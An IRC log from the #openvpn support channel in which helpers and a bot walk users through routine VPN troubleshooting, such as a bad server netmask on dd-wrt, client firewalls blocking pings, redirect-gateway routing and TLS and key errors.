00:25 -!- LifeIsPain [~lip@static-50-53-203-94.bvtn.or.frontiernet.net] has joined #openvpn
00:26 < LifeIsPain> !welcome
00:26 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
00:26 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
00:26 < LifeIsPain> !goal
00:26 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
00:31 < LifeIsPain> As the full on scope of this is more likely to be handled by #dd-wrt, I'm first trying to determine if the UDP port which is being listened to by openvpn server should appear as open when scanned. I have a theory that the configuration isn't opening up the port on my router as it is supposed to, but want to verify that it SHOULD appear as open when scanned and not a black hole
00:35 < pekster> LifeIsPain: That depends more on your firewall. UDP ports don't show as "open" like TCP does as UDP is stateless
00:37 < LifeIsPain> as my dd-wrt is both the firewall and the openvpn server, in theory (with the new config method) it should enable the port, but when I attempt to connect with an openvpn client, I get variations upon timeouts and can't connect
00:38 < pekster> I can't help you with your OS as I don't use dd-wrt. tcpdump the traffic to see if it's even arriving at the server.
Remember that tcpdump hooks before netfilter, so it's possible to see tcpdump traffic and still block it at the OS level
00:38 < LifeIsPain> but yea, I thought that it being a UDP may not allow for a method of checking to see if the port itself is being listened to by openvpn
00:39 < LifeIsPain> wait, tcpdump for a udp connection?
00:39 < pekster> ...
00:39 < pekster> tcpdump shows you network traffic. Last I checked, UDP is network traffic
00:39 < pekster> man tcpdump may be of use
00:40 < pekster> Something like 'tcpdump -pnvi eth0 udp port 1194' might be a hint to get you started
00:40 < LifeIsPain> ah, I think I know where you are going with that, I was just thinking of a different use
00:40 < pekster> If you can't get connected, you either aren't listening on the host/port you're connecting to, or have a firewall problem
00:40 < pekster> Both should be easy to fix
00:42 < LifeIsPain> thanks for the info there, not to hit it a bit more
00:42 < LifeIsPain> trick is to figure out if it is actually a firewall or a listening issue though
00:42 < pekster> Not really
00:43 < LifeIsPain> configured to be open on the firewall, and have tried multiple ports
00:43 < pekster> 'man netstat'
00:44 < LifeIsPain> no udp listeners running, marvelous
00:44 < LifeIsPain> (on the router)
00:44 < pekster> You used -l?
00:44 < LifeIsPain> yep
00:44 < LifeIsPain> I should be more specific, no UDP on 1194
00:44 < pekster> How do you have "no udp listeners" if your router does DHCP to a LAN? Or do you not use DHCP?
00:44 < pekster> Ah, k
00:45 < pekster> So, your process either isn't running, or not listening on 1194
00:45 < pekster> 'ps aux | grep openvpn' or maybe 'pidof openvpn'
00:45 < pekster> Can't connect to something that isn't running
00:46 < LifeIsPain> aux isn't valid in this case, everything is root
00:46 < LifeIsPain> but yea, no openvpn
00:46 < LifeIsPain> process running
00:46 < pekster> That would preclude connections, yes
01:04 -!- LifeIsPain [~lip@static-50-53-203-94.bvtn.or.frontiernet.net] has quit [Changing host]
01:04 -!- LifeIsPain [~lip@unaffiliated/lifeispain] has joined #openvpn
01:21 < LifeIsPain> cat /var/log/openvpn
01:21 < LifeIsPain> Options error: --server directive network/netmask combination is invalid
01:21 < LifeIsPain> well, that explains why openvpn isn't running, too bad I can't see what command dd-wrt is trying to run
01:23 < pekster> Ping downstream, or look at the initscript code yourself to figure out how their OS does things
01:24 < pekster> fwiw, I decided I hated the openwrt UCI-centric shipped initscript and just wrote my own that uses standard openvpn config files and supports multiple independently-controlled tunnels
01:26 < LifeIsPain> yep, pinging them already, but this is Idle Relay Chat, may be a while
01:27 < pekster> Take the time to learn how your distro does init maybe. Armed with that knowledge, you might be able to spot the issue or write your own (better) init system that doesn't rely on using a web interface to abstract what openvpn is really doing
01:27 < pekster> At the very least it's often trivial to output the command it's calling with some creative use of echo commands
01:58 < LifeIsPain> so many things to do!
But at least I found out if I enable it as TAP instead of TUN, it runs and has the port enabled in the listener
01:59 < pekster> Don't use tap unless you actually need it; it's wasteful in terms of overhead, Ethernet broadcasts add to worthless network traffic, and it opens the door to connected clients to perform L2 attacks on the network, such as ARP-spoofing
01:59 < pekster> !tunortap
01:59 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you
01:59 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun.
02:00 < LifeIsPain> yea, I really don't want to use tap
02:02 < LifeIsPain> On the plus side, at least some of the traffic will be filtered if I end up sticking with tap, as I have a switch in the way
02:03 < pekster> huh?
02:03 < pekster> No, switches don't have anything to do with it. OpenVPN acts as a switch in that sense
02:04 < pekster> ARPs are sent to the Ethernet broadcast address, ie: FF:FF:FF:FF:FF:FF.
Conforming Ethernet switches must send this broadcast to all connected hosts
02:05 < LifeIsPain> I should have known that, this may be why it isn't good to do networking prior to going to sleep ;)
02:17 < LifeIsPain> pekster: well, thanks much for your time, I've got more ammo at least for when I hit this sometime after waking up
02:23 -!- Mcloven [~Mcloven@ppp203-122-218-215.static.internode.on.net] has quit [Ping timeout: 255 seconds]
02:48 < LifeIsPain> well, dang, so much for going to sleep, but I have openvpn running if I modify the conf file, dd-wrt was being stupid in how it wrote the server line, so the error was right on
02:48 < LifeIsPain> server 172.24.43.1 255.255.255.0
02:49 < LifeIsPain> changed that .1 to a .0, and it listened to my port and the process stayed running
03:03 -!- izual [~izual@dhcp-133-136.dorms.ntua.gr] has joined #openvpn
03:07 -!- izual [~izual@dhcp-133-136.dorms.ntua.gr] has quit [Remote host closed the connection]
03:44 -!- LifeIsPain [~lip@unaffiliated/lifeispain] has quit [Ping timeout: 276 seconds]
04:03 -!- GabrieleV_ [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Excess Flood]
04:06 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn
04:14 -!- Orbi [~opera@109.129.9.231] has joined #openvpn
04:16 -!- rfxn [~teck7@bas1-montreal54-1167956220.dsl.bell.ca] has joined #openvpn
04:25 -!- Orbi [~opera@109.129.9.231] has left #openvpn []
04:28 -!- catsup [~d@64.111.123.163] has quit [Read error: Connection reset by peer]
04:35 -!- k1ng [~k1ng@unaffiliated/k1ng] has quit [Read error: Operation timed out]
04:46 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
05:25 -!- Orbi [~opera@109.129.9.231] has joined #openvpn
05:35 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn
05:41 < Changos> Hi guys, I've a problem, I need to connect two subnets.
VPN is up, I can make ping from client to any PC on server LAN, but backwards it doesn't :s
05:42 < Changos> any idea ?
05:42 < pekster> !serverlan
05:42 <@vpnHelper> "serverlan" is (#1) for a lan behind a server, the server must have ip forwarding enabled (!ipforward), the server needs to push a route for its lan to clients, and the router of the lan the server is on needs a route added to it (!route_outside_openvpn) or (#2) see !route for a better explanation or (#3) Handy troubleshooting flowchart: http://ircpimps.org/serverlan.png
05:44 < pekster> My guess is a firewall if your ping from VPN client to a server-side LAN IP not the server gives you a reply. Unless you're doing NAT on that traffic
05:45 < Changos> I found howtos and books on the Internet, and I tried many configs and nothing :s, add manual routing, client-config-dir ccd, iroute. :s
05:46 < Changos> well, ip forwarding done, route added done
05:46 < Changos> !route_outside_openvpn
05:46 <@vpnHelper> "route_outside_openvpn" is (#1) If your server is not the default gateway for the LAN, you will need to add routes to your gateway. See ROUTES TO ADD OUTSIDE OPENVPN in !route or (#2) Here are 2 diagrams that explain how this works: http://www.secure-computing.net/wiki/index.php/Graph http://i.imgur.com/BM9r1.png
05:47 < pekster> What IP can you ping from your VPN client? Is what you're able to ping now the server's LAN IP?
05:47 < pekster> Or can you also ping boxes on the LAN behind the server?
05:48 < pekster> (I think that's what you said is working, just double-checking)
05:48 < Changos> NAT on client firewall, I try it
05:48 < pekster> Not if you want bi-directional traffic...
05:48 < pekster> NAT specifically *breaks* bi-directional traffic
05:49 < pekster> ie: you will never be able to ping VPN clients from server-side LAN clients if you do that
05:49 < Changos> pekster: first question, any ip, second question, sure, any type of icmp is clear on firewall
05:49 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
05:49 < pekster> Okay, so you already have a return-route on the server-side LAN
05:49 < pekster> Your problem is a firewall, not routing
05:50 < pekster> Either on the VPN server, or the VPN client that is firewalling the ping going from a server-LAN system IP to the IP of a VPN client
05:50 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit]
05:51 < Changos> yeah, ping between each VPN device is done
05:52 < Changos> ping between client to any LAN on server successful
05:52 < pekster> Right, I got that
05:53 < pekster> And the other way is not working, between the same 2 hosts that are successful in your prior test, right?
05:53 < Changos> ping between any PC on server to LAN IP on client unsuccessful
05:53 < pekster> Yes. As I've already said, this means you have a firewall problem
05:53 < pekster> Is your default gateway on the server-side LAN also your VPN server?
05:56 < Changos> yes, it is the same default gw
05:58 < pekster> If the server-LAN default gateway is the same system as your VPN server, then 2 things can be firewalling the ping: your VPN server, or your client
05:59 < pekster> tcpdump first on the server's LAN interface, then on the tun device to make sure the ping is received and goes down the tunnel to the client
06:04 < Changos> ping some PC LAN server to IP LAN client
06:04 < Changos> tcpdump on server
06:04 < Changos> tcpdump -nnvvS
06:04 < Changos> tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 65535 bytes
06:04 < Changos> 07:02:34.708238 IP (tos 0x0, ttl 63, id 0, offset 0, flags [DF], proto ICMP (1), length 84) 192.168.14.74 > 192.168.11.131: ICMP echo request, id 4554, seq 1, length 64
06:04 < Changos> 07:02:35.707905 IP (tos 0x0, ttl 63, id 0, offset 0, flags [DF], proto ICMP (1), length 84) 192.168.14.74 > 192.168.11.131: ICMP echo request, id 4554, seq 2, length 64
06:04 < Changos> echo request but doesn't reply
06:04 < pekster> So, you can see the requests going to the 192.168.11.131 client, but no replies
06:05 < pekster> The client is firewalling the response, or you are not pushing the server-LAN route to the client
06:05 < Changos> exactly
06:05 < pekster> You have a 'push "route 192.168.14.0 255.255.255.0"' statement in your server config? (or w/e the netmask is on that LAN)
06:06 < Changos> yesh this line exist on server.conf
06:06 < pekster> Then fix your client to not firewall the ping
06:07 < pekster> Your connection is working just fine. The VPN client is choosing not to reply to the traffic
06:07 < Changos> I've the route on my client that exist lan on server
06:08 < pekster> And what exactly does that have to do with the firewall I've said is your problem?
06:08 < Changos> pekster: yeah, i know it, xDD, but i don't know if the problem is on some config on OpenVPN or firewall or routing on client side
06:08 < Changos> I check my firewall on client side
06:09 < Changos> the static route on client side exist
06:09 < Changos> 192.168.14.0 192.168.9.21 255.255.255.0 UG 0 0 0 tun0
06:09 < Changos> 14.0 LAN server
06:09 < Changos> 9.21 IP VPN client
06:10 < pekster> Yes. We already know this works as you can ping the server-side PC
06:10 < pekster> Your *client* *firewall* is the problem. For the 4th time.
06:10 < pekster> ie: your client is specifically ignoring the ping request, as is common for client firewall configurations
06:12 < Changos> pekster: haha, I check just now my firewall on client
06:13 < pekster> It's fine to leave it on, but you should allow traffic through the firewall you specifically want to accept
06:13 < pekster> You don't "need" pings to work for connectivity, unless you wish to accept and reply to them
06:26 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
06:35 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 244 seconds]
06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 276 seconds]
06:46 -!- goldkatze [~nobody@unaffiliated/goldkatze] has joined #openvpn
06:51 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn
07:03 -!- master_of_master [~master_of@p57B542F9.dip.t-dialin.net] has quit [Ping timeout: 255 seconds]
07:05 -!- master_of_master [~master_of@p57B53E8C.dip.t-dialin.net] has joined #openvpn
08:16 -!- k1ng [~k1ng@unaffiliated/k1ng] has joined #openvpn
08:37 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Ping timeout: 244 seconds]
08:45 -!- ade_b [~Ade@koln-5d819626.pool.mediaWays.net] has joined #openvpn
08:45 -!- ade_b [~Ade@koln-5d819626.pool.mediaWays.net] has quit [Changing host]
08:45 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
08:50 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
08:56 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Ping timeout: 248 seconds]
09:10 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn
09:32 -!- JackWinter [~jack@ppp-256.vo.lu] has quit [Quit: ZNC - http://znc.in]
09:33 -!- b1rkh0ff [~b1rkh0ff@178.77.27.113] has joined #openvpn
09:34 -!- goldkatze [~nobody@unaffiliated/goldkatze] has quit []
09:34 -!- JackWinter [~jack@ppp-256.vo.lu] has joined #openvpn
09:43 -!- LifeIsPain [~lip@unaffiliated/lifeispain] has joined #openvpn
09:58 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn
09:58 -!- dannoz [~zirkin@203.sub-70-193-128.myvzw.com] has joined #openvpn
09:58 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Client Quit]
10:00 < dannoz> I'm trying to use openvpn to browse the web from my laptop while at work via my server at home. I am able to connect from work via openvpn and see my local samba shares but the other traffic is not being routed through home. Any hints?
10:00 < dannoz> !paste
10:00 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use
10:00 < pekster> This may be of use:
10:00 < pekster> !redirect
10:00 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server.
or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart:
10:00 <@vpnHelper> http://ircpimps.org/redirect.png
10:01 < pekster> Optionally, I also have a setup where I connect via OpenVPN to a cloud server and just point my browser to a proxy there via a FF plugin that manages proxies at the click of a button (FoxyProxy)
10:02 < pekster> ie: only the browser traffic is redirected, and other traffic stays on the local LAN's routing setup
10:02 < dannoz> I have --redirect-gateway enabled. I have ipforwarding and nat enabled on the server (for home lan) does it need to be specifically enabled for openvpn as well
10:03 < dannoz> !nat
10:03 <@vpnHelper> "nat" is (#1) http://openvpn.net/howto.html#redirect for an explanation of NAT as it applies to openvpn or (#2) http://www.secure-computing.net/wiki/index.php/OpenVPN/FAQ#Traffic_forwarding_doesn.27t_work_when_using_client_specific_access_rules or (#3) dont forget to turn on ip forwarding or (#4) please choose between !linnat !winnat and !fbsdnat for specific howto
10:03 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn
10:03 < dannoz> !linnat
10:03 <@vpnHelper> "linnat" is (#1) for a basic iptables NAT where 10.8.0.x is the vpn network: iptables -t nat -A POSTROUTING -s 10.8.0.0/24 -o eth0 -j MASQUERADE or (#2) to choose what IP address to NAT as, you can use iptables -t nat -I POSTROUTING -o eth0 -j SNAT --to or (#3) http://netfilter.org/documentation/HOWTO//NAT-HOWTO.html for more info or (#4) openvz see !openvzlinnat
10:03 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Client Quit]
10:04 < pekster> If you have 'push "redirect-gateway"' in the server-config, the client should override the default gateway.
It's wise to use the 'def1' flag too, otherwise your local LANs DHCP renewal can wipe out your default route 10:05 < pekster> Given that the directive is pushed from your server, how have you determined it's not going through the VPN interface? 10:08 < dannoz> Using a site such as whatismyip.com doesn't give my home server's IP and using tracert again I see many stops through work 10:09 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 10:09 < pekster> Can you pastebin your server config and client log at 'verb 4' ? 10:12 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn 10:12 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Client Quit] 10:13 < dannoz> client: http://pastebin.com/R1ngSMRY 10:14 < dannoz> server: http://pastebin.com/610cimTp 10:15 < pekster> Gateway should be getting redirected based on line 16 in the client conf, unless logs report failure (which is why I'd like to see client logs as well to verify that) 10:16 < pekster> route output of the client may help confirm that, although there could still be other surprises in the logs 10:16 < pekster> maybe 'ip route show' (Linux) or 'route -4 print' (Windows) 10:16 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has joined #openvpn 10:16 < dannoz> Client Log: http://pastebin.com/s6DWc4SM 10:18 < dannoz> Route on Client: http://pastebin.com/ieLhCM0e 10:19 < pekster> Double default gateway entries 10:19 < pekster> I'd suggest using 'redirect-gateway def1' instead 10:19 < pekster> That adds two /1 CIDR routes instead of trying to replace the pre-existing default gateway, which leads to strange behaviour like you're seeing 10:20 < dannoz> IOW: only on the server side and not on the client side? 
10:20 < pekster> No, you can do 'redirect-gateway' on the client like you are 10:20 < pekster> Optionally the server can use the push directive to push it to the client; the effect is the same 10:20 < pekster> Just turn the client config on line 16 to read: redirect-gateway def1 10:21 < pekster> And try that 10:22 < dannoz> testing... 10:23 < dannoz> nice 10:25 < dannoz> Wow... always turns out to be one or two extra characters or a "." in the wrong place. Thanks a bunch pekster 10:25 < pekster> You will run into issues if you connect from a local network (on the client) that uses 192.168.1.0/24 as is very common with many routers since the ranges will overlap 10:26 < dannoz> any suggestions? 10:27 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn 10:27 < pekster> Renumber your LAN 10:27 < pekster> Or did you mean suggestions for a network? 10:28 < dannoz> Ahh.. ok. Will likely change 192.168.1.0/24 10:28 < pekster> If you know in advance you'll only have the client on a non-conflicting LAN it's not a problem, but e.g. coffee shops may use 192.168.1.0/24 10:28 < pekster> huh, no, not the VPN network 10:28 < pekster> your home LAN that you're pushing a route to 10:28 < dannoz> right... if I change home to ... 192.168.169.0/24 all is (likely) good no? 10:29 < pekster> Sure, that's obscure enough to be very unlikely to cause you issues 10:29 < pekster> Oh, "change 192.168.1.0/24" I read as "change to"... 
confusion not intended 10:30 < pekster> It's not an issue from work where you have a different network, but it may be if you go to someone's home or wifi cafe 10:31 < dannoz> cool thanks again 10:31 -!- dannoz [~zirkin@203.sub-70-193-128.myvzw.com] has quit [] 10:34 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye] 10:50 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has joined #openvpn 10:50 -!- openbsdnoob [~openbsdno@91-66-20-106-dynip.superkabel.de] has quit [Client Quit] 11:19 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 11:28 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 11:37 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:51 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 12:03 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Quit: Ex-Chat] 12:21 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Write error: Connection reset by peer] 12:23 -!- Changos [~Changos@unaffiliated/changos] has quit [Ping timeout: 260 seconds] 12:32 < matsh> !goal 12:32 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc 12:39 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn 12:56 < matsh> Okay, I have a goal 12:56 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 276 seconds] 12:57 < matsh> I want a secure connection between >1 computers, eventually with access of the lans behind each server 13:09 < matsh> !paste 13:09 <@vpnHelper> "paste" is "pastebin" is (#1) please paste anything with more than 5 lines into pastebin or a similar website or (#2) https://gist.github.com is a recommended place to use 13:16 -!- pwrcycle [~pwrcycle@173.214.160.92] has quit [Changing 
host] 13:16 -!- pwrcycle [~pwrcycle@unaffiliated/pwrcycle] has joined #openvpn 13:22 -!- pingUone [brads@2600:3c00::f03c:91ff:fe70:f0a9] has joined #openvpn 13:24 -!- pingUone [brads@2600:3c00::f03c:91ff:fe70:f0a9] has left #openvpn [] 13:33 -!- sherl0ck [~sherl0ck@unaffiliated/sherl0ck] has joined #openvpn 13:34 < sherl0ck> using a bridge site to site VPN, each site with a dedicated dhcp server, how do i set up dns resolution? any better way than having a DNS server at site A, and site B would then use site A DNS server through the tunnel? 13:34 -!- sherl0ck [~sherl0ck@unaffiliated/sherl0ck] has left #openvpn [] 13:34 -!- sherl0ck [~sherl0ck@unaffiliated/sherl0ck] has joined #openvpn 13:34 < sherl0ck> thanks 13:51 <@novaflash> !dns 13:51 <@vpnHelper> "dns" is (#1) Level3 open recursive DNS server at 4.2.2.[1-6] or (#2) Google open recursive DNS server at 8.8.8.8 / 8.8.4.4 or (#3) you might be looking for !pushdns 13:52 <@novaflash> !pushdns 13:52 <@vpnHelper> "pushdns" is (#1) push "dhcp-option DNS a.b.c.d" to push dns to the client or (#2) http://thread.gmane.org/gmane.network.openvpn.user/25139/focus=25147 see that mail archive for some info on pushing dns or (#3) http://article.gmane.org/gmane.network.openvpn.user/25149 for a perm fix via regedit or (#4) in unix you'll use the update-resolv-conf script or (#5) also 13:52 <@vpnHelper> http://comments.gmane.org/gmane.network.openvpn.user/31975 reports --register-dns as fixing their problems pushing DNS to windows 7 13:54 < sherl0ck> yea thought so 13:54 < sherl0ck> thanks 13:55 -!- sherl0ck [~sherl0ck@unaffiliated/sherl0ck] has left #openvpn ["PING 1361130913"] 13:58 -!- Changos [~Changos@unaffiliated/changos] has quit [Ping timeout: 256 seconds] 13:59 -!- Changos [~Changos@190.147.184.189] has joined #openvpn 13:59 -!- Changos [~Changos@190.147.184.189] has quit [Changing host] 13:59 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn 14:01 -!- brute11k [~brute11k@89.249.230.159] has joined #openvpn 14:01 
-!- brute11k1 [~brute11k@89.249.230.159] has quit [Read error: Operation timed out] 14:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 14:15 < Changos> pekster: nothing :s, I look the firewall on my client site, and just fine, I guess :/ 14:37 -!- Valcorb__ [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:37 -!- Valcorb__ [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 14:38 -!- Valcorb__ [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 14:38 < matsh> I get some tls errors: http://pastebin.com/u8R2SCWP 14:39 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 14:46 -!- max_ [~max@98.225.19.83] has quit [Remote host closed the connection] 14:55 < Changos> matsh: try again to make certificate 15:00 < matsh> clean-all and redo all of them? 15:03 < Changos> !help 15:03 <@vpnHelper> (help [] []) -- This command gives a useful description of what does. is only necessary if the command is in more than one plugin. 15:03 < Changos> !site_to_site 15:08 < rfxn> !help site_to_site 15:08 <@vpnHelper> Error: There is no command "sitetosite". 15:15 < matsh> !help client-to-client 15:15 <@vpnHelper> Error: There is no command "clienttoclient". 
15:19 < matsh> Changos: Still the same after making new certs 15:20 < Changos> matsh: :S 15:20 < matsh> I have also opened for all udp on both ends for testing 15:22 -!- ade_b [~Ade@koln-5d819626.pool.mediaWays.net] has joined #openvpn 15:22 -!- ade_b [~Ade@koln-5d819626.pool.mediaWays.net] has quit [Changing host] 15:22 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 15:57 -!- Valcorb__ [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 16:00 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:03 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 16:08 -!- Orbi [~opera@109.129.9.231] has left #openvpn [] 16:10 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 16:23 -!- rrva [unknown@y.mima.x.se] has joined #openvpn 16:24 < rrva> hi. I want to go from a single client single server static key setup to a two (not more) client single server setup. What's the easiest route? 16:32 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 16:37 -!- n0sq [~quassel@75-135-14-61.dhcp.krny.ne.charter.com] has joined #openvpn 16:47 -!- Changos [~Changos@unaffiliated/changos] has quit [Ping timeout: 248 seconds] 17:13 -!- hazardous [~dbn@void.kassad.in] has quit [Changing host] 17:13 -!- hazardous [~dbn@openvpn/user/hazardous] has joined #openvpn 17:13 -!- mode/#openvpn [+v hazardous] by ChanServ 17:19 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 17:20 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving] 17:52 < LifeIsPain> Is there a method of checking why the private key isn't loaded based off of the error message more specifically? 
: Cannot load private key file /path/to/openvpn/key.pem: error:0B080074:lib(11):func(128):reason(116) Error: private key password verification failed 17:53 < LifeIsPain> issue being that there isn't a key password 17:55 -!- Denial [Denial@cpc15-tonb3-2-0-cust76.16-3.cable.virginmedia.com] has quit [] 18:18 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 18:25 -!- Devastator [~devas@unaffiliated/devastator] has quit [Ping timeout: 256 seconds] 18:34 -!- brute11k1 [~brute11k@89.249.230.159] has joined #openvpn 18:34 -!- brute11k [~brute11k@89.249.230.159] has quit [Ping timeout: 264 seconds] 18:51 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn 18:59 -!- catsup [~d@64.111.123.163] has joined #openvpn 19:01 -!- b1rkh0ff [~b1rkh0ff@178.77.27.113] has quit [Ping timeout: 240 seconds] 19:04 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 248 seconds] 19:10 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 20:04 -!- Changos [~Changos@unaffiliated/changos] has joined #openvpn 20:33 -!- digilink [~digilink@unaffiliated/digilink] has quit [Ping timeout: 252 seconds] 20:49 -!- digilink [~digilink@unaffiliated/digilink] has joined #openvpn 20:52 -!- baobeiiii [~baobeiiii@180.155.14.35] has joined #openvpn 20:52 < baobeiiii> client stuck in management:wait 20:57 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Quit: emmanuelux] 21:01 < kisom> baobeiiii: OK, I'll note that down :) 21:02 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 21:05 -!- SpeedingBus [~root@216.17.109.26] has joined #openvpn 21:14 -!- SpeedingBus [~root@216.17.109.26] has quit [] 21:15 -!- SpeedingBus [~root@5.231.5.192] has joined #openvpn 21:24 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 21:25 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 21:25 -!- SpeedingBus 
[~root@5.231.5.192] has quit [Ping timeout: 248 seconds] 21:28 -!- SpeedingBus [~root@5.231.5.192] has joined #openvpn 21:29 < baobeiiii> can't ping the server but it's up 21:30 < baobeiiii> i guess ip is blocked 21:31 < SpeedingBus> what ip is it? 21:38 < baobeiiii> 192.73.252.241 21:38 < baobeiiii> no ssh or ping from here 21:39 < baobeiiii> had two servers, both IPs seem blocked 21:41 < baobeiiii> if it's the case just hoping it was auto blocked by chinese firewall and not some guy intent on ruining my day 21:45 < SpeedingBus> I can ping that ip 21:45 < SpeedingBus> isn't that good news 21:45 < baobeiiii> i just reprovisioned my server to a new cloud 21:45 < baobeiiii> similar ip but different, can now ssh 21:45 < baobeiiii> normally i use the openvpn snapshot repo but i can't find a link for it without vpn lol 21:47 < SpeedingBus> are you from China? 21:47 < baobeiiii> Shanghai 21:47 < SpeedingBus> the firewall there sounds scary 21:48 < baobeiiii> basically i need to wget http://openvpn snapshot for centos/redhat 21:48 < baobeiiii> then rpm -Uvh the above 21:49 < SpeedingBus> I think most of us use wget to get openvpn 21:49 < baobeiiii> this would be the first time i've had the entire ip blocked, perhaps they blocked a subnet 21:49 < SpeedingBus> I mean, that's the fastest way 21:49 < SpeedingBus> yeah, definitely sounds scary 21:49 < SpeedingBus> I can't imagine living in shanghai without internet! 
